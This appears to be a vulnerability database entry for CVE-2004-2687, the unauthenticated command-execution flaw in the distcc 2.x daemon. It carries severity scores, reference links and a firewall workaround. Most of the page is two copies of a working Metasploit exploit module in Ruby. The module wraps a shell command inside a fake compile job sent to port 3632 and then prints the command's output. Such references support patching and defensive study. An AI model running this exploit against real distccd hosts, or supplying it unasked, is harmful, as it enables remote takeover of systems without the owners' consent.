CVE-2004-2687
CVSS 9.3
Published: 2004-12-31 00:00:00
Last revised: 2008-09-05 00:00:00

[Original] distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.


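[CNNVD] Apple Xcode Tools configuration error vulnerability (CNNVD-200412-679)

        When distcc 2.x, as used in XCode 1.5 and other versions, is not configured to restrict access to the server port, remote attackers can execute arbitrary commands via compilation jobs, which the server executes without authorization checks.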

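- CVSS (base score)

CVSS score: 9.3 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: NETWORK [the attacker does not need internal-network or local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-16 [Configuration]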

- CPE (affected platforms and products)

cpe:/a:samba:samba:2.18.3 (Samba 2.18.3)
cpe:/a:apple:xcode:1.5

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-679
(Official data source) CNNVD

- Other links and resources

http://www.osvdb.org/13378
(UNKNOWN)  OSVDB  13378
http://www.metasploit.org/projects/Framework/exploits.html#distcc_exec
(UNKNOWN)  MISC  http://www.metasploit.org/projects/Framework/exploits.html#distcc_exec
http://lists.samba.org/archive/distcc/2004q3/002562.html
(UNKNOWN)  MLIST  [distcc] 20040826 Exploit in distcc ( got compromised ;( )
http://lists.samba.org/archive/distcc/2004q3/002550.html
(UNKNOWN)  MLIST  [distcc] 20040826 Exploit in distcc ( got compromised ;( )
http://distcc.samba.org/security.html
(UNKNOWN)  CONFIRM  http://distcc.samba.org/security.html
http://archives.neohapsis.com/archives/bugtraq/2005-03/0183.html
(UNKNOWN)  BUGTRAQ  20050310 XCode 1.5 and distcc 2.x Exploit

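- Vulnerability information

Apple Xcode Tools configuration error vulnerability
High risk; configuration error
2004-12-31 00:00:00 2007-09-24 00:00:00
Remote
        When distcc 2.x, as used in XCode 1.5 and other versions, is not configured to restrict access to the server port, remote attackers can execute arbitrary commands via compilation jobs, which the server executes without authorization checks.

- Advisories and patches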

        

- Vulnerability information (16919)

DistCC Daemon Command Execution (EDBID:16919)
linux remote
2010-07-03 Verified
0 metasploit
##
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DistCC Daemon Command Execution',
			'Description'    => %q{
				This module uses a documented security weakness to execute
				arbitrary commands on any system running distccd.

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2004-2687'],
					[ 'OSVDB', '13378' ],
					[ 'URL', 'http://distcc.samba.org/security.html'],

				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 01 2002'
			))

			register_options(
				[
					Opt::RPORT(3632)
				], self.class)
	end

	def exploit
		connect

		distcmd = dist_cmd("sh", "-c", payload.encoded);
		sock.put(distcmd)

		dtag = rand_text_alphanumeric(10)
		sock.put("DOTI0000000A#{dtag}\n")

		res = sock.get_once(24, 5)

		if !(res and res.length == 24)
			print_status("The remote distccd did not reply to our request")
			disconnect
			return
		end

		# Check STDERR
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]

		return if not len
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stderr: #{line}")
			end
		end

		# Check STDOUT
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]

		return if not len
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stdout: #{line}")
			end
		end

		handler
		disconnect
	end


	# Generate a distccd command
	def dist_cmd(*args)

		# Convince distccd that this is a compile
		args.concat(%w{# -c main.c -o main.o})

		# Set distcc 'magic fairy dust' and argument count
		res = "DIST00000001" + sprintf("ARGC%.8x", args.length)

		# Set the command arguments
		args.each do |arg|
			res << sprintf("ARGV%.8x%s", arg.length, arg)
		end

		return res
	end

end

		

- Vulnerability information (F82331)

DistCC Daemon Command Execution (PacketStormID:F82331)
2009-10-28 00:00:00
H D Moore  metasploit.com
exploit,arbitrary
CVE-2004-2687

This Metasploit module uses a documented security weakness to execute arbitrary commands on any system running distccd.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'DistCC Daemon Command Execution',
			'Description'    => %q{
				This module uses a documented security weakness to execute
				arbitrary commands on any system running distccd.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2687'],
					[ 'OSVDB', '13378' ],
					[ 'URL', 'http://distcc.samba.org/security.html'],

				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,				
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(3632)
				], self.class)			
	end

	def exploit
		connect

		distcmd = dist_cmd("sh", "-c", payload.encoded);
		sock.put(distcmd)
		
		dtag = rand_text_alphanumeric(10)
		sock.put("DOTI0000000A#{dtag}\n")
		
		res = sock.get_once(24, 5)
		
		if !(res and res.length == 24)
			print_status("The remote distccd did not reply to our request")
			disconnect
			return
		end
		
		# Check STDERR
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]
		
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stderr: #{line}")
			end
		end

		# Check STDOUT
		res = sock.get_once(4, 5)
		res = sock.get_once(8, 5)
		len = [res].pack("H*").unpack("N")[0]
		
		if (len > 0)
			res = sock.get_once(len, 5)
			res.split("\n").each do |line|
				print_status("stdout: #{line}")
			end
		end
				
		handler
		disconnect
	end
	
	
	# Generate a distccd command
	def dist_cmd(*args)
	
		# Convince distccd that this is a compile
		args.concat(%w{# -c main.c -o main.o})
		
		# Set distcc 'magic fairy dust' and argument count
		res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
		
		# Set the command arguments
		args.each do |arg|
			res << sprintf("ARGV%.8x%s", arg.length, arg)
		end
		
		return res
	end

end

    

- Vulnerability information

13378
distcc Daemon Command Execution
Remote / Network Access Misconfiguration
Loss of Integrity Workaround
Exploit Public

- Vulnerability description

distcc contains a flaw that may allow a malicious user to execute arbitrary commands. distcc does not perform any authentication or authorization of connections, and instead relies on 3rd party access controls. It is possible that the flaw may allow arbitrary command execution resulting in a loss of integrity.

- Timeline

2002-02-01 Unknown
2002-02-01 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Use ssh or firewall rules to restrict connections to the server.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
